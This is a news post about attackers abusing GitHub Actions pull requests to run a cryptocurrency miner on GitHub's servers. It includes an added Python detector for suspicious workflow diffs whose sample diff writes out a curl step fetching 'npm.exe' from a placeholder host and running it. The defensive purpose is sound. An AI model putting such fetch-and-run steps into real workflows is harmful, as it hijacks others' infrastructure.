Attack abusing GitHub Actions to mine crypto assets on GitHub's servers discovered



GitHub's servers have been found to be used for crypto asset (virtual currency) mining through abuse of 'GitHub Actions', which automates software workflows.

GitHub Actions being actively abused to mine cryptocurrency on GitHub servers
https://www.bleepingcomputer.com/news/security/github-actions-being-actively-abused-to-mine-cryptocurrency-on-github-servers/



News site Bleeping Computer reports that the attack begins by forking a legitimate repository that has GitHub Actions enabled and inserting malicious code into the fork. The attacker then submits a pull request asking the maintainers of the original repository to merge the code back.

The screenshot of the repository that was actually attacked looks like this.



According to Justin Perdok, who reported the attack, the attack is triggered simply by submitting a pull request; the pull request does not need to be approved.

According to Bleeping Computer, a malicious pull request asks GitHub's server to download 'npm.exe' hosted on GitLab. This 'npm.exe' is a mining program that has nothing to do with the Node.js installer or Node Package Manager, and it executes mining via the arguments and wallet address provided by the attacker.
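A maintainer-side check for the pattern described above, as an added example that is not code from Bleeping Computer, GitHub, or the affected repositories: it scans a pull request's diff for lines added to workflow files that fetch a binary from a host outside an allowlist or run a local `.exe`. The allowlist, the function name `review_pr_diff`, and the sample diff (including its host and arguments) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts this project expects its workflows to download from.
ALLOWED_HOSTS = {"github.com", "objects.githubusercontent.com"}
BINARY_EXT = (".exe", ".msi", ".dll", ".bin", ".ps1", ".sh")
URL_RE = re.compile(r"https?://[^\s'\"]+")
WORKFLOW_RE = re.compile(r"^\.github/workflows/[^/]+\.ya?ml$")
LOCAL_EXE_RE = re.compile(r"(^|\s)\.[/\\][\w.-]+\.exe\b", re.IGNORECASE)

# Constructed sample diff; the host, paths and arguments are placeholders.
SAMPLE_DIFF = """\
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -8,1 +8,3 @@
     steps:
+      - run: curl -L -o npm.exe https://gitlab.example.invalid/u/r/-/raw/main/npm.exe
+      - run: ./npm.exe ARGS_PLACEHOLDER
diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1,1 +1,2 @@
 # project
+Installer: https://downloads.example.invalid/setup.exe
"""

def review_pr_diff(diff_text):
    """Return (file, reason, added_line) for risky lines added to workflow files."""
    findings, current = [], None
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):  # file header: remember which file follows
            path = raw[4:].strip()
            current = path[2:] if path.startswith("b/") else path
            continue
        if not raw.startswith("+") or not current or not WORKFLOW_RE.match(current):
            continue  # only lines the PR adds to a workflow definition
        added = raw[1:].strip()
        for url in URL_RE.findall(added):
            parsed = urlparse(url)
            if parsed.path.lower().endswith(BINARY_EXT) and parsed.hostname not in ALLOWED_HOSTS:
                findings.append((current, f"downloads binary from {parsed.hostname}", added))
        if LOCAL_EXE_RE.search(added):
            findings.append((current, "runs a local .exe", added))
    return findings

if __name__ == "__main__":
    for finding in review_pr_diff(SAMPLE_DIFF):
        print(finding)
```

The README change in the sample is ignored because only files under `.github/workflows/` are inspected; a binary name that imitates a familiar tool, such as `npm.exe`, is flagged by where it comes from rather than by what it is called.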

In the past, there was an attack that abused GitHub's infrastructure via GitHub Actions to host a botnet, but this attack appears to use the servers only for mining.

in Web Service,   Security, Posted by logc_nt